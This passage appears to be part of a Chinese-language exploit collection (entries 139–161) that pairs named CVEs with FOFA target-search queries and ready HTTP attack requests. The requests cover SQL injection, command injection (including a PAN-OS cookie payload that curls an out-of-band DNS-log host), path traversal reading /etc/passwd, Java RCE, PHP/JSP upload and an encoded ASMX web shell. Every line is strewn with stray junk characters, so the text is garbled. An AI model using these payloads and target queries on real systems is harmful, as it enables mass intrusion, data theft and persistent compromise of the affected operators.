( v) w( |8 a: j! rAccept-Encoding: gzip, deflate, br! n% ^4 C" Y; u+ R$ K* {: Y& a
Connection: close _" ]6 m+ s( I8 L V
Upgrade-Insecure-Requests: 1/ X* D' M. e* N. ~- [9 Y( D
$ L& J- h. w, t8 z4 V
) F/ A. P9 z6 c: o0 o0 N$ O9 K: q
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
4 V% i; m- z0 n" MCVE-2024-26223 _7 C' E# {$ c! P* g
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
* `3 O6 m9 g9 q" E. Q! vGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
5 X% A) f' w/ |: Q: H' qHost: x.x.x.x
# o9 Y o, T! Q0 L6 B9 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
( U' ]& v+ n6 o' ]( B' L; f3 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ t0 p6 x% n D% b1 E0 O6 _6 a; _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ q- {, E1 [9 V; H! e) I
Accept-Encoding: gzip, deflate, br
) w+ J- J- a; S% ?$ ^6 l& SConnection: close& M' M6 d. [, v; }. J
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk) i4 p9 Y0 f% x
Upgrade-Insecure-Requests: 1- b \: p9 Z, b
q7 ]4 O3 D1 x8 W+ O- {8 U4 S: [0 R
0 z* k& J% f2 w140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入, W: z% Y" C" a, ^2 z+ H
CVE-2024-25665 l$ _. S! I2 n& M' O
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"; P, {3 F; V5 `: H
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
2 H" ]6 b. Y1 @" [Host: x.x.x.x/ h$ c& i+ c& @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.02 R) a& T6 v1 Z- F H0 d1 R' [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# ~: h$ I6 ?, `: ]9 b& L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 [2 R& |; s5 H4 \0 vAccept-Encoding: gzip, deflate, br0 [ p3 @, t% c. E+ ~: H
Connection: close
# v) b* w1 F j, ACookie: authcode=h8g9
: K' l* {& d" }. ?, n$ k( @Upgrade-Insecure-Requests: 1& V* F* b- a7 B/ N, M1 {
, t4 v5 H* k8 b- v. U' U
! Z0 Y3 a$ L: x/ c% O2 J9 C1 z7 d141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入. Y: l4 R1 D7 Z2 h8 Y1 ^5 c
FOFA:body="指挥调度管理平台"
0 c6 {, f# Z: G: u$ _8 _, l7 hPOST /app/ext/ajax_users.php HTTP/1.1
% Z" F) \6 [0 B% c. [( s* HHost: your-ip
; x" a+ A( B) b/ q5 m* z2 BUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
1 X! z/ o) U: \" JContent-Type: application/x-www-form-urlencoded
( i7 D2 Q- X& |7 t, d9 [
0 S& r+ ?5 \' s R' i& L
+ g1 c4 `. G( \: \dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
3 |7 K0 c+ J0 _- g) R7 {1 u- q+ |' N
& d- u5 u. x0 ~* ]" f' y W
142. CMSV6车辆监控平台系统中存在弱密码
. [- |, I/ ~9 ^+ DCVE-2024-29666
0 F) A- x+ d8 A' aFOFA:body="/808gps/"
/ x8 `9 r" ^- S, q/ ^admin/admin
2 ~. \" U0 t Y5 A6 P143. Netis WF2780 v2.1.40144 远程命令执行1 U" x$ {/ |. Y
CVE-2024-25850
$ r: J. w1 x8 u8 {: oFOFA:title='AP setup' && header='netis'0 H0 R+ t7 \" T0 q! f0 V) o3 H
PAYLOAD
5 Q1 {( C& A6 V5 Z- w1 U6 s) e, ^6 {6 Z0 `. j+ d8 m' t+ m
144. D-Link nas_sharing.cgi 命令注入
$ M: S M8 _' CFOFA:app="D_Link-DNS-ShareCenter") A7 M+ s. l; W0 U7 V2 K& A
system参数用于传要执行的命令
- s! h* j$ j8 G3 h$ p% }5 o) \8 mGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1: u5 H! a5 b' ^! H2 M
Host: x.x.x.x) k. d* {- e' @! _; a
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
$ U9 Y, T) o, t# U0 n) ]# R8 PConnection: close# P$ j1 w( Q" W" @6 I1 M. ^
Accept: */*
. ^5 b8 h- Q! d- IAccept-Language: en4 D% I/ N3 u; u
Accept-Encoding: gzip
6 O# A/ n7 Q |8 W. }7 y5 `1 g, T) P A& N- w& z
7 T7 w0 r! Z5 A- c145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
' T Z1 t: ^% G* nCVE-2024-3400/ R: T. v; H/ Q" v, L/ [* h. s% @
FOFA:icon_hash="-631559155"
4 D# m) c/ C ^/ HGET /global-protect/login.esp HTTP/1.1
8 U5 h9 G: P5 ` D5 F; Y2 lHost: 192.168.30.112:1005
" t" q3 U9 `( Q0 h! SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.848 O2 p. T' n9 l+ Y- `8 N# D8 y" y2 A
Connection: close
+ G+ {1 y6 A$ C& y0 X/ TCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
; x+ e. q$ {6 J& I) LAccept-Encoding: gzip5 c- n9 r+ K2 e) U- ~1 G' f O% s' T
! n. R% i6 s( I5 M. t! \5 }5 q; V2 I6 `1 u9 o4 A/ S$ `6 Y
146. MajorDoMo thumb.php 未授权远程代码执行
- f; F9 m* u, W BCNVD-2024-021754 z" r7 C& C E: W
FOFA:app="MajordomoSL") q: r' x: g( d! T$ _% o
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
+ T* D" `/ `* h) B# `- cHost: x.x.x.x' Q; p, {6 y' y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
8 ]: P2 u: A+ I2 J+ h& T8 i4 wAccept-Charset: utf-8
8 v3 ?9 P; Z- j! eAccept-Encoding: gzip, deflate! L, g( p+ p9 t# @4 b0 Q' H
Connection: close
' D6 {4 b* @9 s) h7 w' O* }( v% @* K0 l8 h9 y7 @
" N: Q9 B, A; D0 z& L9 T
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
; z* ]2 w! e/ Y! c3 GCVE-2024-323991 g7 b. u) w- T/ k5 L) H
FOFA:body="RaidenMAILD"% l4 b4 Q1 L3 z/ V! o5 [5 \
GET /webeditor/../../../windows/win.ini HTTP/1.1
. V& f/ T6 \8 O5 h0 O# ^+ N' _; FHost: 127.0.0.1:811 M! U' E7 u, ? k+ G5 U$ ]0 V# m9 h
Cache-Control: max-age=0
5 Q- B) k2 X K# [: V2 |; [% PConnection: close5 m" E; R, p. E9 H2 k
( }* J7 k0 U: d- C6 p2 {% y; G, \& G5 E
; b5 s t- w* g/ N, s; c8 q148. CrushFTP 认证绕过模板注入: i9 J3 ]* w R: [- y8 {
CVE-2024-40405 S" L [- Y6 n% B. h
FOFA:body="CrushFTP"
! \: N1 ?+ c* C! ~: B# t) e. y6 ^PAYLOAD; P& v: T9 S; A; I# k- B
- _# G$ f1 g/ x# R
149. AJ-Report开源数据大屏存在远程命令执行
h$ \( n8 {, Y. i8 C" t% d; g5 rFOFA:title="AJ-Report"8 ]9 T( s& G% k8 @# b% k( v
) X) e$ V% c% P+ H' F$ kPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1* H |7 z" G8 i/ V( s# C/ e
Host: x.x.x.x
; _0 S$ }9 _7 @2 ~0 R# hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36# W9 ^* `- N( M+ B; e* z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* t3 y. S9 ~( ]/ L2 G& Y. TAccept-Encoding: gzip, deflate, br
# `' R, ]* O7 l" R& S! g' ~, g ]Accept-Language: zh-CN,zh;q=0.9& j. V' y$ j- a+ d ]% [* z
Content-Type: application/json;charset=UTF-8# o( H6 w9 l7 z7 }- T3 J8 W9 ^8 B3 z
Connection: close
5 i. o3 O1 R% r6 S* }2 n- ~( ~/ `' i P8 s A6 I
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}. ~2 m) r3 t5 e7 ^
2 ]# n+ R( [2 [" A
150. AJ-Report 1.4.0 认证绕过与远程代码执行# p# g9 k$ I$ O8 s7 e( @
FOFA:title="AJ-Report"0 P$ x4 g, W, ~+ _1 i2 O& j1 H' w3 ^
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
. e+ u& } Y) r) I8 K4 `7 @Host: x.x.x.x
! \- n1 W7 `9 u/ ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
' v" p5 S* ~+ E$ d" J9 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* k( U6 ]5 U# H0 i! b
Accept-Encoding: gzip, deflate, br# ^, I- c7 r0 [6 h5 i4 l& b
Accept-Language: zh-CN,zh;q=0.9& B: z. K9 M& l8 J0 A+ O6 }8 r0 u! Y
Content-Type: application/json;charset=UTF-8/ I* I$ H Y" B) Z5 Y1 D
Connection: close1 G- W1 o8 W# V0 o" Z+ w
Content-Length: 339# c7 Z ~* U# q5 p L
# p. y( ^1 p5 L+ ]
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}# @) H( E1 e7 R. o4 Z) ^3 z2 h
- @5 `: Y* H) ^* c
0 ?! E/ G* Y/ m+ R* u+ K$ s151. AJ-Report 1.4.1 pageList sql注入) I; [9 g6 L$ l( V
FOFA:title="AJ-Report"6 d" ^3 I0 J: a! m' W$ M' r- e3 F* O
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.11 }- J' t$ q& F" D1 b
Host: x.x.x.x) I& g( r1 ^: q* X9 V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- D. l9 Z7 | s6 U) n7 k4 D2 G; q
Connection: close! T7 Y5 b6 Y. R8 [, S2 A l
Accept-Encoding: gzip
# t: V# B) M- a/ }' `
/ M1 `% B' a* v3 E" { ~, X8 g, |9 ` |% [3 X' x* Q
152. Progress Kemp LoadMaster 远程命令执行' p1 x3 a* `5 S4 [9 d# @
CVE-2024-12126 K4 r; {' b& R. {. D! T
LoadMaster <= 7.2.59.2 (GA)1 C; r; f1 p w7 q5 q
LoadMaster<=7.2.54.8 (LTSF)7 P, d0 K, W" C: p$ Y
LoadMaster <= 7.2.48.10 (LTS)
# K9 `0 l) y- D# C4 ~8 k) @) f4 OFOFA:body="LoadMaster"
0 _5 `' m' h+ y1 i1 v# p; }. LJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码/ ~9 F T0 K' s1 c- e
GET /access/set?param=enableapi&value=1 HTTP/1.1
D: u; x" s6 m# i+ L) Y7 nHost: x.x.x.x
8 g- m" P$ N4 q! I7 `6 O$ F+ gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
' f7 x# X0 M9 C) W& cConnection: close
7 ] k" u: [! U' E% c/ _+ aAccept: */*' y8 V( W' |7 @7 @9 m" M
Accept-Language: en. B3 @" T! k) N* L) {4 b% a0 f
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=' O- H% z' B/ M+ Y4 ]/ A
Accept-Encoding: gzip
5 e, s' v3 ?7 e$ R+ O z% k
# Y7 u5 ?0 D+ Y F
5 X( G: B ]7 N! w# H153. gradio任意文件读取% D' q5 t" x F V V
CVE-2024-1561FOFA:body="__gradio_mode__"8 H$ { i/ Z+ e
第一步,请求/config文件获取componets的id
9 s4 V0 Z3 ]3 C2 h- Q9 m( s- _http://x.x.x.x/config2 b. x( ]" P( j: g+ i
& w- l/ f5 |1 o8 l/ G# v2 f* `
7 [/ ~9 J" h, o5 A6 C+ f
第二步,将/etc/passwd的内容写入到一个临时文件
4 Z) }; I3 C# E9 }4 O; _& f+ MPOST /component_server HTTP/1.1
4 ?1 F9 Z4 D! ~6 ?, ?Host: x.x.x.x4 K5 {; `: a! {- u4 x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3! v* ]+ t, B& R- g) }
Connection: close
\; Y. M- N! @& U, C& c: jContent-Length: 115# V& K2 i. { U" h8 u% Q3 t
Content-Type: application/json9 j; ?- ?. }- l. v8 {
Accept-Encoding: gzip, ^8 v' D" Y5 N0 d3 c
/ ]4 L% n+ }" d0 B{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}& _% {$ |4 g2 R6 P
9 {6 |& R% I, D4 J5 Y
$ B+ ]1 s4 S' T; B- M7 I4 a0 p+ u2 p第三步访问/ Y4 N4 x$ \; V% U! J1 M/ `
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
`9 o w3 _# X* Q8 H
; u% Z- g( {0 w, X, Z
2 b3 _/ x& |3 F8 i) V154. 天维尔消防救援作战调度平台 SQL注入
" ?# M, o& X4 r0 [& c* F7 aCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
& x! D. i8 I5 Y ZPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
1 E0 E- j1 ]0 L4 W/ D2 k) jHost: x.x.x.x
' S2 ~5 Q: Z* I8 X( _ a2 YContent-Length: 106
% s& A$ ~: W1 a o. F! x8 m! mCache-Control: max-age=0# N: E. f# b3 V
Upgrade-Insecure-Requests: 1+ E- Z5 b, f$ S1 F
Origin: http://x.x.x.x
% n! [0 [# C* G/ e& E' eContent-Type: application/json) i/ H4 b! h$ ^" @8 q! a u3 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
* P# w. N, w/ r: ~' E# [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 _6 i3 D6 a: u# E7 j& |+ qReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page) s9 [* _4 V U" G$ M
Accept-Encoding: gzip, deflate
: Z9 P0 A6 N% f( K" x1 ]/ jAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7" D' T. ?7 Y' H7 V; d# F
Connection: close
: ]* d3 S1 V0 A) r& F# j' m; T7 m4 t- f; J% F
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}8 k: R% d* t' [: i; N' z# H
7 ]1 V' @. |/ \
" I+ x9 }& ^$ {
155. 六零导航页 file.php 任意文件上传! W: R4 j: \6 d' @
CVE-2024-34982& l F% h' \& @5 }: ]$ p
FOFA:title=="上网导航 - LyLme Spage"7 b# y- K" L- w& J% E
POST /include/file.php HTTP/1.1( o. g0 C( K0 n# \" T
Host: x.x.x.x
& v8 j- l+ I( ? C; |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
, ?+ c$ i1 V. l6 ?3 h- k6 ]* uConnection: close
4 X, S2 Z% o c7 o n5 oContent-Length: 232
/ V* p. V' ?0 O1 I& q+ j! oAccept: application/json, text/javascript, */*; q=0.01/ P9 h( s# U+ s1 d; \1 p, B: X
Accept-Encoding: gzip, deflate, br$ Y1 V6 b4 s! U/ a s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ c: e2 G- g0 M/ e/ a. h, A( W) GContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
) ?- C) {7 @- E7 V' L3 FX-Requested-With: XMLHttpRequest1 ?/ Z/ V* }( a1 @: i4 K
2 H7 }& m& p: @; N; }% E( d, n4 M& D
-----------------------------qttl7vemrsold314zg0f
2 U7 _# H: B% E" p* M. xContent-Disposition: form-data; name="file"; filename="test.php" G$ p9 m3 P& Z( p. R6 l' S
Content-Type: image/png& i! m6 R* |" V; h( Z6 v
" `4 x" x; y% A m4 S5 C& v Z J<?php phpinfo();unlink(__FILE__);?>4 B, H) S% f6 ~: |% F, G0 N
-----------------------------qttl7vemrsold314zg0f--
( L: X1 E+ F$ p4 i: f% H$ v2 d/ G- `5 n
" ?/ Q1 i. U, f9 e' @; z$ Y访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
& Y2 R$ A( V$ n0 G7 A7 [" T$ \! W7 S9 ~6 o. X/ i
156. TBK DVR-4104/DVR-4216 操作系统命令注入8 s& Z# E: E! r Q5 @! s
CVE-2024-3721( c' T g3 G3 O$ [& {1 K( u9 U: L
FOFA:"Location: /login.rsp"
+ H( f D- h; T0 T7 f4 r·TBK DVR-4104
! w# N ^) q$ `* a·TBK DVR-4216
" ?$ s* P F5 e6 a, {( h7 k Wcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"$ b- p( D3 ?& a4 p( `4 A2 `! k9 _
. L' m. w5 K( r# f
; Z9 c2 r: S4 t: ^POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1, P7 g, e' I% }# v- ] x
Host: x.x.x.x
% G# B$ @# Y& j L* A( WUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 X9 p1 o ^. P T/ E+ tConnection: close v5 Q7 I- o/ Z1 B* [$ L+ ~
Content-Length: 0
- ~; u2 n# a7 c- ~9 hCookie: uid=1" U5 R& @" E, W
Accept-Encoding: gzip( T$ [' P) \2 K# B& ?, j( W
" o. e: q! t( _* i' D0 N& G1 E+ n3 N& L1 l+ R% t. ]. {% U$ \
157. 美特CRM upload.jsp 任意文件上传: O0 b& o# o, q& n: O; u
CNVD-2023-069711 C1 z# }! k" O
FOFA:body="/common/scripts/basic.js"
9 m, }3 @: v+ UPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.17 S7 x4 K& w) t3 a) I
Host: x.x.x.x
u# @! {* Q$ [; ~; ^+ MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
, N& J. ~) @; jContent-Length: 709
: g( o: C \8 v- b& k% RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( A0 v; _* e1 O/ P6 }" }
Accept-Encoding: gzip, deflate
$ z. j0 @. V- I/ q* H' I% L" bAccept-Language: zh-CN,zh;q=0.9 o" a6 m" A; F, C
Cache-Control: max-age=02 J% U: a$ x/ d2 X! C6 T K
Connection: close3 O2 m" a- h4 N8 X: C
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Z& e% e" x0 O: K$ S5 cUpgrade-Insecure-Requests: 1
* E) C1 b& u3 `. }( d- A. Q; U, j% @) x6 [; H
------WebKitFormBoundary1imovELzPsfzp5dN
5 }7 g% \ u& B6 `8 _! L6 O- J( A4 ~5 PContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
. B5 t5 E' }, u5 |" g! C B8 w9 ^Content-Type: application/octet-stream
$ l$ t0 d' i, V, |; x' X
0 t7 m; L U4 J( l3 `nyhelxrutzwhrsvsrafb j5 G' B/ d& h- R y8 N1 d; b: [. W
------WebKitFormBoundary1imovELzPsfzp5dN- }/ [4 k( k" |. M/ L
Content-Disposition: form-data; name="key"/ d& B$ ]2 H& K3 N
! R6 |8 N _/ X0 T& S4 Unull
G6 ]% F, E, j5 s% m8 s5 z5 U* v4 T: U------WebKitFormBoundary1imovELzPsfzp5dN
% F1 M; Y6 x q# U5 SContent-Disposition: form-data; name="form"0 O7 P8 u6 s+ t* ~( R$ f
' g- m# i3 k3 D8 R* L1 R( Xnull- N( w+ o0 P# R! e4 r5 m
------WebKitFormBoundary1imovELzPsfzp5dN
) w% e$ Z$ X4 }. `) G8 FContent-Disposition: form-data; name="field"& ^; P" k4 t7 D# g% R
: K: }5 l5 M) K; D+ @
null. N' d% I S" z
------WebKitFormBoundary1imovELzPsfzp5dN2 l, x) a; S# R8 q6 L- b
Content-Disposition: form-data; name="filetitile" P* B3 Y7 h5 q( Z
& d' C; c% ~* ]1 f$ K& K4 W3 Onull& b! i, B* {+ Z6 H& e- |: E! R8 F, d
------WebKitFormBoundary1imovELzPsfzp5dN2 R+ q3 [( j- n# p! V) m' H; e
Content-Disposition: form-data; name="filefolder"5 `- u1 c& i3 i! R ~; w
* ]- r$ C- S+ h* t
null: D+ s B* ^& }
------WebKitFormBoundary1imovELzPsfzp5dN--
- w: e4 ]6 v( U) `) N+ a0 {3 K" n6 P& s- r3 o0 ~
( x; g" \* m; W# I; a% yhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp# s3 f+ r9 w, `5 r* E
/ U" B* }$ Q7 D. i158. Mura-CMS-processAsyncObject存在SQL注入
& a- t7 S+ D1 f6 FCVE-2024-32640
+ d# M3 g+ m0 ~, I( ] D B& l! s" OFOFA:"Generator: Masa CMS"+ _. [% \& a" D
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.11 B h; }, B% P$ }
Host: {{Hostname}}& H1 i# i) z& M! T8 F1 C d5 w
Content-Type: application/x-www-form-urlencoded
1 I( l( v, P; V" @: Z' l' {! B3 _7 _% P( O
object=displayregion&contenthistid=x\'&previewid=1
6 P3 Q, |# p/ t; W. t6 K
3 a# D& \6 n) V) ] _4 P( s' C( K5 A: U4 z! [
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
) @" i9 i8 Q* W8 {' d' j, yFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")2 r% i+ K$ H6 Q* I
POST /webservices/WebJobUpload.asmx HTTP/1.15 G" {. ]: W% _2 R
Host: x.x.x.x; E) P0 R, v- d2 e- N) T ^* e; i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36# @; S2 `3 `, v. i- x
Content-Length: 1080
7 q3 f) y- k% G9 k5 H- kAccept-Encoding: gzip, deflate
7 W3 Q. p, L. D: P0 CConnection: close
G7 D% o% G( c7 u9 e! KContent-Type: text/xml; charset=utf-8/ i2 Q9 f& M; O2 P v
Soapaction: "http://rainier/jobUpload"4 l$ |7 W; J, ^5 K( H' x2 ^' I
# [& V4 Y5 X" V) q+ D( r% |1 J5 _<?xml version="1.0" encoding="utf-8"?>3 C( O& O4 `$ L" j
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
) r2 i. g. f r: w7 Z' ?1 C<soap:Body>
" d9 k9 S9 a9 g9 a# j<jobUpload xmlns="http://rainier">6 L" e, f' Y5 [
<vcode>1</vcode> q _% j7 f! X+ S, N
<subFolder></subFolder>3 Q+ J, ^3 [6 c. Q) y! E/ C; m0 o
<fileName>abcrce.asmx</fileName>) {0 @6 W1 m" C; w0 [7 Z# a
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
' I( v( g0 `1 I/ }8 s6 X9 g; O</jobUpload>4 O. i5 l# [0 f9 _
</soap:Body>
: M# a8 @" k0 e6 e% v, C9 @</soap:Envelope>2 l- H7 ?" r" G
0 W7 k7 p% [6 p4 @; X
) b0 e' @; w2 }+ v/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")! H3 V3 c, q- k3 }0 W; H" i
3 ]; E: A5 E, O/ l0 D% z* U
& \6 M; {4 u& y6 A& [ r4 B160. Sonatype Nexus Repository 3目录遍历与文件读取! C) q6 B( m. q- ~! u
CVE-2024-4956* m" w, V2 W4 w# q
FOFA:title="Nexus Repository Manager" |2 h. r7 s5 j, r* D5 c2 X8 {
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1- S9 N4 N+ G4 S, E9 j1 |' Y5 w
Host: x.x.x.x) K, v& `* d% t1 q
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
. k, s) |+ J4 w: _* D3 e. x' uConnection: close, \: P; f" x' u( w' {1 w# n
Accept: */*
' B6 o/ R7 u* uAccept-Language: en
2 D5 u u9 T9 }2 o! [* yAccept-Encoding: gzip) d; y& X2 I, R
' h3 l+ R' c. }! K# B
J1 _" k n- J2 h161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传( W! _1 ^ l9 x% N9 g; N
FOFA:body="/KT_Css/qd_defaul.css"$ `2 ]* V0 O7 N {& @
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密$ w! i- G( ?0 Z
POST /Webservice.asmx HTTP/1.1: @4 F, ^9 @! [8 i) L; x
Host: x.x.x.x
6 m s, s9 k5 N5 {1 s1 s' tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
! c* S E, F% w8 }6 ]3 yConnection: close
6 K0 s6 o# S, V+ {' W6 [( P* Q( I* E5 zContent-Length: 445 ?. @' I7 u6 N, j* S3 l. @2 V
Content-Type: text/xml: f% T) a+ i/ i$ {/ t) B
Accept-Encoding: gzip' m" d$ U& z" U0 {( A7 u
